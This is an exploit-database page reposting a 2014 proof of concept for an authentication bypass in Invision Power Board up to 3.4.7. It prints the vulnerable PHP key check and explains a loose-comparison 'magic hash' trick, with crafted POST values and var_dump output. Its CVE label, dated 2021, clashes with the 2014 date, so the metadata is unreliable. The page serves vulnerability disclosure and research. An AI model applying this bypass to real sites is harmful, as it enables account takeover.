Advertisement






Invision Power Board <= 3.4.7 password change

CVE Category Price Severity
CVE-2021-28130 CWE-287 N/A High
Author Risk Exploitation Type Date
Jinson Varghese Behanan High Remote 2014-11-25
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014110173

Below is a copy:

# Exploit Title: Invision Power Board <= 3.4.7 password change
# Date: 25.11.2014
# Exploit Author: ZeroDay
# Software Link: http://www.invisionpower.com/
# Version: <= 3.4.7
# Tested on: 3.4.7
# About: For the G-Owl with Love

vuln code
interface/ipsconnect/ipsconnect.php

public function change( $id, $key, $username, $displayname, $email, $md5Password, $redirect, $redirectHash )
{
if ( $key != md5( $this->masterKey . $id ) )
{
$this->_return( base64_encode( $this->settings['board_url'] ), array( 'status' => 'BAD_KEY' ) );
}

$member = IPSMember::load( intval( $id ), 'none', 'id' );
if ( !$member['member_id'] )
{
$this->_return( $redirect, array( 'status' => 'NO_USER' ) );
}
...

if ( $key != md5( $this->masterKey . $id ) ) An incorrect comparison != is used in this line.

If the $this->masterKey variable is "1234", then, to pass the comparison check successfully, we will have to send the POST parameters: id=1x5306758&key=0e123 - where "1x" is the user_id.

var_dump(intval('1x5306758')); //int(1)
var_dump(md5('1234'.'1x5306758')); //string(32) "0e206089892480803868366430752394"
var_dump('0e123' == md5('1234'.'1x5306758')); //bool(true)

BUT! Since the we do not know the $this->masterKey variable, the only things we will have to hope for are bruteforce and luck ;)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum